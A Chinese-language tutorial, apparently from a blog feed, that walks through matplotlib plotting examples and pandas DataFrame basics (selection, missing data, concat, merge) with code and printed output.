    png

    2.3 设置坐标轴 1

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.4 设置坐标轴 2

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.figure(num=3, figsize=(8, 5))
    plt.plot(x, y2)
    plt.plot(x, y1, color='red', linewidth=4.0, linestyle='--')

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    ax = plt.gca()
    ax.spines['right'].set_color('none') # 消失右端坐标轴
    ax.spines['top'].set_color('none') # 消失顶端坐标轴
    ax.xaxis.set_ticks_position('bottom') # 关联坐标轴
    ax.yaxis.set_ticks_position('left')
    ax.spines['bottom'].set_position(('data', 0)) # 修改原点位置
    ax.spines['left'].set_position(('data', 0))

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.5Legend 图例

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y1 = 2 * x + 1
    y2 = x ** 2

    plt.xlim((-1, 2)) # 设置取值范围
    plt.ylim((-2, 3))
    plt.xlabel('I am X') # 设置坐标轴名称
    plt.ylabel('I am Y')

    new_ticks = np.linspace(-1, 2, 5) # 设置单位范围
    print(new_ticks)
    plt.xticks(new_ticks)

    plt.yticks([-2, -1.8, -1, 1.22, 3], [r'$really\ bad$', r'$bad\ \alpha$', r'$normal$', r'$good$', r'$really\ good$']) # 设置单位标签

    l1, = plt.plot(x, y2, label='up') # 设置图例
    l2, = plt.plot(x, y1, color='red', linewidth=1.0, linestyle='--', label='down')
    plt.legend(handles=[l1, l2,], labels=['aaa', 'bbb'] , loc='best') # 显示图例

    plt.show()
    [-1.   -0.25  0.5   1.25  2.  ]

    png

    2.6 Annotation 标注

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 2 * x + 1

    plt.figure(num=1, figsize=(8, 5),)
    plt.plot(x, y,)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

    x0 = 1
    y0 = 2 * x0 + 1
    plt.scatter(x0, y0, s=50, color='b') # 显示点(1, 3)
    plt.plot([x0, x0], [y0, 0], 'k--', lw=2.5) # 绘制黑色虚线

    plt.annotate(r'$2x+1=%s$' % y0, xy=(x0, y0), xycoords='data', xytext=(+30, -30),
    textcoords='offset points', fontsize=16, arrowprops=dict(arrowstyle='->',
    connectionstyle='arc3, rad=.2')) # 输入注释

    plt.text(-3.7, 3, r'$This\ is\ the\ some\ text.\ \mu\ \sigma_i\ \alpha_t$',
    fontdict={'size': 16, 'color': 'r'})

    plt.show()

    png

    2.7 tick 能见度

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    import matplotlib.pyplot as plt
    import numpy as np

    x = np.linspace(-3, 3, 50)
    y = 0.1 * x

    plt.figure()
    plt.plot(x, y, lw=10)
    plt.ylim(-2, 2)

    ax = plt.gca()
    ax.spines['right'].set_color('none')
    ax.spines['top'].set_color('none')
    ax.xaxis.set_ticks_position('bottom')
    ax.spines['bottom'].set_position(('data', 0))
    ax.yaxis.set_ticks_position('left')
    ax.spines['left'].set_position(('data', 0))

    for label in ax.get_xticklabels() + ax.get_yticklabels():
    label.set_fontsize(12)
    label.set_bbox(dict(facecolor='yellow', edgecolor='None', alpha=0.7))

    plt.show()

    png

    3.1 Scatter 散点图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    import matplotlib.pyplot as plt
    import numpy as np

    n = 1024
    X = np.random.normal(0, 1, n)
    Y = np.random.normal(0, 1, n)
    T = np.arctan2(Y, X) # 只是为了好看
    plt.scatter(X, Y, s=75, c=T, alpha=0.5)
    plt.xlim((-1.5, 1.5))
    plt.ylim((-1.5, 1.5))
    plt.xticks(()) # 隐藏所有的 xticks
    plt.yticks(())

    plt.show()

    png

    3.2 Bar 柱状图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    import matplotlib.pyplot as plt
    import numpy as np

    n = 12
    X = np.arange(n)
    Y1 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))
    Y2 = (1 - X / float(n) * np.random.uniform(0.5, 1.0, n))

    plt.bar(X, +Y1, facecolor="#9999ff", edgecolor="white") # 向上的柱状图
    plt.bar(X, -Y2, facecolor="#ff9999", edgecolor="white") # 向下的柱状图

    for x, y in zip(X, Y1): # zip 把 X,Y1 分别传给 x, y
    # ha: horizontal alignment
    plt.text(x, y + 0.05, '%.2f' % y, ha='center', va="bottom")
    for x, y in zip(X, Y2): # zip 把 X,Y1 分别传给 x, y
    # ha: horizontal alignment
    plt.text(x, -y - 0.2, '%.2f' % -y, ha='center', va="bottom")

    plt.xlim(-0.5, n)
    plt.xticks(())
    plt.ylim(-1.25, 1.25)
    plt.yticks(())

    plt.show()

    png

    3.3 Contours 等高线图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    import matplotlib.pyplot as plt
    import numpy as np


    def f(x, y):
    return (1 - x / 2 + x ** 5 + y ** 3) * np.exp(-x ** 2 - y ** 2)


    n = 256
    x = np.linspace(-3, 3, n)
    y = np.linspace(-3, 3, n)
    X, Y = np.meshgrid(x, y) # 把 x 和 y 绑定成网格的输入值

    plt.contourf(X, Y, f(X, Y), 8, alpha=0.75, cmap=plt.cm.hot)
    C = plt.contour(X, Y, f(X, Y), 8, colors='black')

    plt.clabel(C, inline=True, fontsize=10)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

    3.4 Image 图片

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    import matplotlib.pyplot as plt
    import numpy as np

    a = np.array(np.random.random(9)).reshape(3, 3) # 图片
    a.sort()
    plt.imshow(a, interpolation="none", cmap='bone', origin='lower')
    plt.colorbar(shrink=0.9)

    plt.xticks(())
    plt.yticks(())
    plt.show()

    png

    3.5 3D 数据

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    fig = plt.figure() # 新建一个 figure 窗口
    ax = Axes3D(fig, auto_add_to_figure=False) # 添加三维坐标轴
    fig.add_axes(ax)

    # 输入数据
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

    4.1 Subplot 多合一显示

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    import matplotlib.pyplot as plt

    plt.figure()

    plt.subplot(2, 1, 1) # 将整个 figure 分成 2 行 1 列,第一张图
    plt.plot([0, 1], [0, 1])

    plt.subplot(2, 3, 4)
    plt.plot([0, 1], [0, 2])

    plt.subplot(235)
    plt.plot([0, 1], [0, 3])

    plt.subplot(236)
    plt.plot([0, 1], [0, 4])

    plt.show()

    png

    4.2 Subplot 分隔显示

    1
    2
    import matplotlib.pyplot as plt
    import matplotlib.gridspec as gridspec
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    # method 1: subplot2grid
    plt.figure()

    ax1 = plt.subplot2grid((3, 3), (0, 0), colspan=3, rowspan=1)
    ax1.plot([1, 2], [1, 2])
    ax1.set_title("ax1_title")

    ax2 = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=1)

    ax3 = plt.subplot2grid((3, 3), (1, 2), colspan=1, rowspan=2)

    ax4 = plt.subplot2grid((3, 3), (2, 0), colspan=1, rowspan=1)

    ax5 = plt.subplot2grid((3, 3), (2, 1), colspan=1, rowspan=1)

    plt.tight_layout()
    plt.show()


    png

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    # method 2: gridspec
    plt.figure()
    gs = gridspec.GridSpec(3, 3)
    ax1 = plt.subplot(gs[0, :])
    ax2 = plt.subplot(gs[1, :2])
    ax3 = plt.subplot(gs[1:, 2])
    ax4 = plt.subplot(gs[-1, 0])
    ax5 = plt.subplot(gs[-1, -2])

    plt.tight_layout()
    plt.show()


    png

    1
    2
    3
    4
    5
    6
    # method 3: easy to define structure
    f, ((ax11, ax12), (ax21, ax22)) = plt.subplots(2, 2, sharex=True, sharey=True)
    ax11.scatter([1, 2], [1, 2])

    plt.tight_layout()
    plt.show()

    png

    4.3 图中图

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import matplotlib.pyplot as plt

    fig = plt.figure()
    x = [1, 2, 3, 4, 5, 6, 7]
    y = [1, 3, 4, 2, 5, 8, 6]

    left, bottom, width, height = 0.1, 0.1, 0.8, 0.8
    ax1 = fig.add_axes([left, bottom, width, height])
    ax1.plot(x, y, 'r')
    ax1.set_xlabel('x')
    ax1.set_ylabel('y')
    ax1.set_title('title')

    left, bottom, width, height = 0.2, 0.6, 0.25, 0.25
    ax2 = fig.add_axes([left, bottom, width, height])
    ax2.plot(y, x, 'b')
    ax2.set_xlabel('x')
    ax2.set_ylabel('y')
    ax2.set_title('title inside 1')

    plt.axes([0.6, 0.2, 0.25, 0.25])
    plt.plot(y[::-1], x, 'g')
    plt.xlabel('x')
    plt.ylabel('y')
    plt.title('title inside 2')


    plt.show()

    png

    4.4 次坐标轴

    1
    2
    import matplotlib.pyplot as plt
    import numpy as np
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    x = np.arange(0, 10, 0.1)
    y1 = 0.05 * x ** 2
    y2 = -1 * y1

    fig, ax1 = plt.subplots()
    ax2 = ax1.twinx() # 把 ax1 的坐标轴镜像翻转
    ax1.plot(x, y1, 'g-')
    ax2.plot(x, y2, 'b--')
    ax1.set_xlabel('X data')
    ax1.set_ylabel('Y1', color='g')
    ax2.set_ylabel('Y2', color='b')

    plt.show()

    png

    5.1 Animation 动画

    1
    2
    3
    import numpy as np
    from matplotlib import pyplot as plt
    from matplotlib import animation
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    fig, ax = plt.subplots()

    x = np.arange(0, 2 * np.pi, 0.01)
    line, = ax.plot(x, np.sin(x))

    def animate(i):
    line.set_ydata(np.sin((x + i / 10)))
    return line,

    def init():
    line.set_ydata(np.sin(x))
    return line,

    ani = animation.FuncAnimation(fig=fig, func=animate, frames=100, init_func=init, interval=20, blit=True)

    plt.show()

    png

    ]]>
    @@ -10266,7 +10266,7 @@ /posts/Python-%E8%8E%AB%E7%83%A6python%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0%EF%BC%88pandas%EF%BC%89/ - 正文

    3.1 pandas 基本介绍

    如果把 numpy 比作列表,pandas 可以比作字典

    import pandas as pd
    import numpy as np

    创建 pandas 序列

    pd.Series([1, 3, 6, np.nan, 44, 1]) # np.nan 相当于 None
    0     1.01     3.02     6.03     NaN4    44.05     1.0dtype: float64

    创建一个日期序列

    dates = pd.date_range('20160101', periods=6)
    dates
    DatetimeIndex(['2016-01-01', '2016-01-02', '2016-01-03', '2016-01-04',               '2016-01-05', '2016-01-06'],              dtype='datetime64[ns]', freq='D')

    生成数据表格, pd.DataFrame(数据, 索引, 标题列表)

    pd.DataFrame(np.random.randn(6, 4), index=dates, columns=['a', 'b', 'c', 'd'])
    a b c d
    2016-01-01 0.014513 0.490584 -1.985363 -1.734158
    2016-01-02 1.694216 0.383375 -1.260541 -0.126581
    2016-01-03 0.475547 1.050239 0.897093 1.155942
    2016-01-04 0.126726 -1.169920 -1.876652 -1.245558
    2016-01-05 0.606119 0.648469 -1.367697 -0.822617
    2016-01-06 -0.615075 0.557680 -2.104794 0.114070

    默认生成的数据表格

    pd.DataFrame(np.arange(12).reshape((3, 4)))
    0 1 2 3
    0 0 1 2 3
    1 4 5 6 7
    2 8 9 10 11

    用字典代替要输入的值

    df = pd.DataFrame({'A': 1,
    'B': pd.Timestamp('20130102'),
    'C': pd.Series(1, index=list(range(4)), dtype='float32'),
    'D': np.array([3] * 4, dtype='int32'),
    'E': pd.Categorical(["test", "train", "test", "train"]),
    'F': 'foo'})
    df
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    3 1 2013-01-02 1.0 3 train foo

    输出表格的类型

    df.dtypes
    A             int64B    datetime64[ns]C           float32D             int32E          categoryF            objectdtype: object

    输出表格的索引

    df.index
    Int64Index([0, 1, 2, 3], dtype='int64')

    输出表格的行名

    df.columns
    Index(['A', 'B', 'C', 'D', 'E', 'F'], dtype='object')

    输出表格每行的数据

    df.values
    array([[1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'test', 'foo'],       [1, Timestamp('2013-01-02 00:00:00'), 1.0, 3, 'train', 'foo']],      dtype=object)

    输出表格每行的数据特征

    df.describe()
    A C D
    count 4.0 4.0 4.0
    mean 1.0 1.0 3.0
    std 0.0 0.0 0.0
    min 1.0 1.0 3.0
    25% 1.0 1.0 3.0
    50% 1.0 1.0 3.0
    75% 1.0 1.0 3.0
    max 1.0 1.0 3.0

    转置表格

    df.T
    0 1 2 3
    A 1 1 1 1
    B 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00 2013-01-02 00:00:00
    C 1.0 1.0 1.0 1.0
    D 3 3 3 3
    E test train test train
    F foo foo foo foo

    排序表格

    df.sort_index(axis=1, ascending=False) # 以行排序,倒序
    F E D C B A
    0 foo test 3 1.0 2013-01-02 1
    1 foo train 3 1.0 2013-01-02 1
    2 foo test 3 1.0 2013-01-02 1
    3 foo train 3 1.0 2013-01-02 1
    df.sort_index(axis=0, ascending=False)
    A B C D E F
    3 1 2013-01-02 1.0 3 train foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    0 1 2013-01-02 1.0 3 test foo
    df.sort_values(by='E')
    A B C D E F
    0 1 2013-01-02 1.0 3 test foo
    2 1 2013-01-02 1.0 3 test foo
    1 1 2013-01-02 1.0 3 train foo
    3 1 2013-01-02 1.0 3 train foo

    3.2 pandas 选择数据

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    选择表格中 A 列的所有数据

    df.A
    2013-01-01     02013-01-02     42013-01-03     82013-01-04    122013-01-05    162013-01-06    20Freq: D, Name: A, dtype: int32
    df['A']
    2013-01-01     02013-01-02     42013-01-03     82013-01-04    122013-01-05    162013-01-06    20Freq: D, Name: A, dtype: int32

    选择表格中某些行中所有的数据

    df[0:3]
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    df['20130102':'20130104']
    A B C D
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15

    根据标签选择数据

    df.loc['20130102']
    A    4B    5C    6D    7Name: 2013-01-02 00:00:00, dtype: int32
    df.loc[:, ['A', 'B']]
    A B
    2013-01-01 0 1
    2013-01-02 4 5
    2013-01-03 8 9
    2013-01-04 12 13
    2013-01-05 16 17
    2013-01-06 20 21
    df.loc['20130102', ['A', 'B']]
    A    4B    5Name: 2013-01-02 00:00:00, dtype: int32

    根据位置选择数据

    df.iloc[3]
    A    12B    13C    14D    15Name: 2013-01-04 00:00:00, dtype: int32
    df.iloc[3, 1]
    13
    df.iloc[3:5, 1:3]
    B C
    2013-01-04 13 14
    2013-01-05 17 18
    df.iloc[[1, 3, 5], 1:3]
    B C
    2013-01-02 5 6
    2013-01-04 13 14
    2013-01-06 21 22

    混合选择表格中的数据

    df.ix[:3, ['A', 'C']] # 高版本中已不推荐使用
    ---------------------------------------------------------------------------AttributeError                            Traceback (most recent call last)Input In [27], in <cell line: 1>()----> 1 df.ix[:3, ['A', 'C']]File ~\anaconda3\lib\site-packages\pandas\core\generic.py:5575, in NDFrame.__getattr__(self, name)   5568 if (   5569     name not in self._internal_names_set   5570     and name not in self._metadata   5571     and name not in self._accessors   5572     and self._info_axis._can_hold_identifiers_and_holds_name(name)   5573 ):   5574     return self[name]-> 5575 return object.__getattribute__(self, name)AttributeError: 'DataFrame' object has no attribute 'ix'

    是或否的筛选

    df[df.A > 8] # 只对比 A,但是 ABCD 都会显示
    A B C D
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    3.3pandas 设置值

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    dates
    DatetimeIndex(['2013-01-01', '2013-01-02', '2013-01-03', '2013-01-04',               '2013-01-05', '2013-01-06'],              dtype='datetime64[ns]', freq='D')
    df
    A B C D
    2013-01-01 0 1 2 3
    2013-01-02 4 5 6 7
    2013-01-03 8 9 10 11
    2013-01-04 12 13 14 15
    2013-01-05 16 17 18 19
    2013-01-06 20 21 22 23

    修改表格中的值

    df.iloc[2, 2] = 1111
    df.loc['20130101', 'B'] = 2222
    df[df.A > 4] = 0
    df.B[df.A > 4] = 0
    df
    A B C D
    2013-01-01 0 2222 2 3
    2013-01-02 4 5 6 7
    2013-01-03 0 0 1111 0
    2013-01-04 0 0 0 0
    2013-01-05 0 0 0 0
    2013-01-06 0 0 0 0

    给表格中添加空的行

    df['F'] = np.nan
    df
    A B C D F
    2013-01-01 0 2222 2 3 NaN
    2013-01-02 4 5 6 7 NaN
    2013-01-03 0 0 1111 0 NaN
    2013-01-04 0 0 0 0 NaN
    2013-01-05 0 0 0 0 NaN
    2013-01-06 0 0 0 0 NaN
    df['E'] = pd.Series([1, 2, 3, 4, 5, 6], index=pd.date_range('20130101', periods=6))
    df
    A B C D F E
    2013-01-01 0 2222 2 3 NaN 1
    2013-01-02 4 5 6 7 NaN 2
    2013-01-03 0 0 1111 0 NaN 3
    2013-01-04 0 0 0 0 NaN 4
    2013-01-05 0 0 0 0 NaN 5
    2013-01-06 0 0 0 0 NaN 6

    3.4 pandas 处理丢失数据

    import pandas as pd
    import numpy as np

    dates = pd.date_range('20130101', periods=6)
    df = pd.DataFrame(np.arange(24).reshape((6, 4)), index=dates, columns=['A', 'B', 'C', 'D'])
    df.iloc[0, 1] = np.nan
    df.iloc[1, 2] = np.nan
    df
    A B C D
    2013-01-01 0 NaN 2.0 3
    2013-01-02 4 5.0 NaN 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    丢弃 nan 数据

    df.dropna(axis=0, how='any') # how = {'any', 'all'} 出现 nan/所有数据都是 nan 是才处理
    A B C D
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    将 nan 数据更改为其他值

    df.fillna(value=0)
    A B C D
    2013-01-01 0 0.0 2.0 3
    2013-01-02 4 5.0 0.0 7
    2013-01-03 8 9.0 10.0 11
    2013-01-04 12 13.0 14.0 15
    2013-01-05 16 17.0 18.0 19
    2013-01-06 20 21.0 22.0 23

    判断表格中是否有缺失数据

    df.isna()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
    df.isnull()
    A B C D
    2013-01-01 False True False False
    2013-01-02 False False True False
    2013-01-03 False False False False
    2013-01-04 False False False False
    2013-01-05 False False False False
    2013-01-06 False False False False
    np.any(df.isnull() is True) # 若返回 True,则说明表格中的确缺失数据
    False

    3.5 3D 数据

    import numpy as np
    import matplotlib.pyplot as plt
    from mpl_toolkits.mplot3d import Axes3D

    fig = plt.figure() # 新建一个 figure 窗口
    ax = Axes3D(fig, auto_add_to_figure=False) # 添加三维坐标轴
    fig.add_axes(ax)

    # 输入数据
    X = np.arange(-4, 4, 0.25)
    Y = np.arange(-4, 4, 0.25)
    X, Y = np.meshgrid(X, Y)
    R = np.sqrt(X ** 2 + Y ** 2)
    Z = np.sin(R)

    ax.plot_surface(X, Y, Z, rstride=1, cstride=1, cmap=plt.get_cmap('rainbow'))
    ax.contourf(X, Y, Z, zdir='z', offset=-2, cmap='rainbow')
    ax.set_zlim(-2, 2)

    plt.show()

    png

    3.6 pandas 合并 concat

    import pandas as pd 
    import numpy as np

    concatenating

    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['a', 'b', 'c', 'd'])
    df3 = pd.DataFrame(np.ones((3, 4)) * 2, columns=['a', 'b', 'c', 'd'])
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    df2
    a b c d
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    df3
    a b c d
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0

    上下合并

    pd.concat([df1, df2, df3], axis=0) # axis=0 竖向划分操作行,1 横向划分操作列
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0
    1 2.0 2.0 2.0 2.0
    2 2.0 2.0 2.0 2.0
    pd.concat([df1, df2, df3], axis=0, ignore_index=True) # 重新排序索引
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    3 1.0 1.0 1.0 1.0
    4 1.0 1.0 1.0 1.0
    5 1.0 1.0 1.0 1.0
    6 2.0 2.0 2.0 2.0
    7 2.0 2.0 2.0 2.0
    8 2.0 2.0 2.0 2.0

    join, [‘inner’, ‘outer’]

    df1 = pd.DataFrame(np.ones((3, 4)) * 0, columns=['a', 'b', 'c', 'd'])
    df2 = pd.DataFrame(np.ones((3, 4)) * 1, columns=['b', 'c', 'd', 'e'])
    df1
    a b c d
    0 0.0 0.0 0.0 0.0
    1 0.0 0.0 0.0 0.0
    2 0.0 0.0 0.0 0.0
    df2
    b c d e
    0 1.0 1.0 1.0 1.0
    1 1.0 1.0 1.0 1.0
    2 1.0 1.0 1.0 1.0

    直接合并出现的结果,会用 nan 填充

    pd.concat([df1, df2], join='outer')
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
    pd.concat([df1, df2], join='inner') # 只会合并相同的部分
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    0 1.0 1.0 1.0
    1 1.0 1.0 1.0
    2 1.0 1.0 1.0
    pd.concat([df1, df2], join='inner', ignore_index=True)
    b c d
    0 0.0 0.0 0.0
    1 0.0 0.0 0.0
    2 0.0 0.0 0.0
    3 1.0 1.0 1.0
    4 1.0 1.0 1.0
    5 1.0 1.0 1.0

    按照索引进行合并

    pd.concat([df1, df2], axis=1, join_axes=[df1.index])
    ---------------------------------------------------------------------------TypeError                                 Traceback (most recent call last)Input In [23], in <cell line: 1>()----> 1 pd.concat([df1, df2], axis=1, join_axes=[df1.index])File ~\anaconda3\lib\site-packages\pandas\util\_decorators.py:311, in deprecate_nonkeyword_arguments.<locals>.decorate.<locals>.wrapper(*args, **kwargs)    305 if len(args) > num_allow_args:    306     warnings.warn(    307msg.format(arguments=arguments),    308         FutureWarning,    309stacklevel=stacklevel,    310     )--> 311 return func(*args, **kwargs)TypeError: concat() got an unexpected keyword argument 'join_axes'

    append 将被移除,不推荐使用

    df1.append([df2, df3])
    C:\Users\gzjzx\AppData\Local\Temp\ipykernel_10380\266511466.py:1: FutureWarning: The frame.append method is deprecated and will be removed from pandas in a future version. Use pandas.concat instead.  df1.append([df2, df3])
    a b c d e
    0 0.0 0.0 0.0 0.0 NaN
    1 0.0 0.0 0.0 0.0 NaN
    2 0.0 0.0 0.0 0.0 NaN
    0 NaN 1.0 1.0 1.0 1.0
    1 NaN 1.0 1.0 1.0 1.0
    2 NaN 1.0 1.0 1.0 1.0
    0 2.0 2.0 2.0 2.0 NaN
    1 2.0 2.0 2.0 2.0 NaN
    2 2.0 2.0 2.0 2.0 NaN

    3.7pandas 合并 merge

    import pandas as pd

    left = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
    'A': ['A0', 'A1', 'A2', 'A3'],
    'B': ['B0', 'B1', 'B2', 'B3']})
    right = pd.DataFrame({'key': ['K0', 'K1', 'K2', 'K3'],
    'C': ['C0', 'C1', 'C2', 'C3'],
    'D': ['D0', 'D1', 'D2', 'D3']})
    left
    key A B
    0 K0 A0 B0
    1 K1 A1 B1
    2 K2 A2 B2
    3 K3 A3 B3
    right
    key C D
    0 K0 C0 D0
    1 K1 C1 D1
    2 K2 C2 D2
    3 K3 C3 D3
    pd.merge(left, right, on='key')
    key A B C D
    0 K0 A0 B0 C0 D0
    1 K1 A1 B1 C1 D1
    2 K2 A2 B2 C2 D2
    3 K3 A3 B3 C3 D3

    在有两个 key 的情况下

    left = pd.DataFrame({'key1': ['K0', 'K0', 'K1', 'K2'],
    'key2': ['K0', 'K1', 'K0', 'K1'],
    'A': ['A0', 'A1', 'A2', 'A3'],
    'B': ['B0', 'B1', 'B2', 'B3']})
    right = pd.DataFrame({'key1': ['K0', 'K1', 'K1', 'K2'],
    'key2': ['K0', 'K0', 'K0', 'K0'],
    'C': ['C0', 'C1', 'C2', 'C3'],
    'D': ['D0', 'D1', 'D2', 'D3']})
    left
    key1 key2 A B
    0 K0 K0 A0 B0
    1 K0 K1 A1 B1
    2 K1 K0 A2 B2
    3 K2 K1 A3 B3
    right
    key1 key2 C D
    0 K0 K0 C0 D0
    1 K1 K0 C1 D1
    2 K1 K0 C2 D2
    3 K2 K0 C3 D3
    pd.merge(left, right, on=['key1', 'key2'], how='inner')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K1 K0 A2 B2 C1 D1
    2 K1 K0 A2 B2 C2 D2
    pd.merge(left, right, on=['key1', 'key2'], how='outer')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
    1 K0 K1 A1 B1 NaN NaN
    2 K1 K0 A2 B2 C1 D1
    3 K1 K0 A2 B2 C2 D2
    4 K2 K1 A3 B3 NaN NaN
    5 K2 K0 NaN NaN C3 D3
    pd.merge(left, right, on=['key1', 'key2'], how='left')
    key1 key2 A B C D
    0 K0 K0 A0 B0 C0 D0
